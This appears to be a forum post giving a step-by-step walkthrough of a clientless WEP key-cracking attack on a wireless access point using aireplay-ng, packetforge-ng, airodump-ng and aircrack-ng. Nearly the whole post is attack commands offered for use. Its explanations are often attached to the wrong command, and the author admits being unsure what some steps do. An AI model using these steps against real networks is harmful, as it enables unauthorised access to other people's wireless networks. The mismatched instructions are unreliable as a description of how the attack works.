I'll show you how I run a clientless attack but be aware this takes more time.
First ill Authenticate to make sure i can. Use your wireless interface as appropriate, mine is ath0 yours could be different.
Once I authenticate I run it again but this time I make it send the keep-alive packet every 30 seconds (because getting the right packet can take time I want to ensure I stay authenticated this may not be necessary)
aireplay-ng -1 0 -e ESSID -a APMAC -h MYMAC ath0
Next, I start looking for that ARP packet using a fragmentation technique
aireplay-ng -1 0 -q 30 -e ESSID -a APMAC -h MYMAC ath0
Hit Y when the screen promts.
aireplay-ng -5 -b APMAC -h MYMAC ath0
If that fails for too long you can try the chop chop technique its -4 instead of -5 and you switch the -b and -h around.
Once i get the right packet I use packetforge Note the *.xor fragment file
Then you want to use tcpdump(I forget exactly what this does, it has something to do with your forged packed used in the previous code.)
packetforge-ng -0 -a APMAC -h MYMAC -k 255.255.255.255 -l 255.255.255.255 -y fragmentfile.xor -w arp_request
Now is when you want to start Sniffing for those ivs so when we start the next part its already setup for us
tcpdump -n -vvv -e -s0 -r arp_request
Now we start forcing that AP to kick some serious packets out so we can catch all the ivs
airodump-ng -c CHANNEL -bssid APMAC -ivs -w capture ath0
Get a whole bunch I just let it run for a while. Theres a specific # you want to look for comparatively to the -bit encryption the AP is using but the more the better anyways.
aireplay-ng -2 -r arp_request ath0
Now we try to crack it!
If you didn't get enough ivs you can always read some more with the packets you made earlier!
aircrack-ng *.ivs -b APMAC
I'm always looking for suggestions myself, although I haven't even bothered with this wifi stuff for a while I am still open for suggestions and comments.
Now that I typed all that out I hope it all still applies, this is actually more for BT2 and I run off the cd not a HD.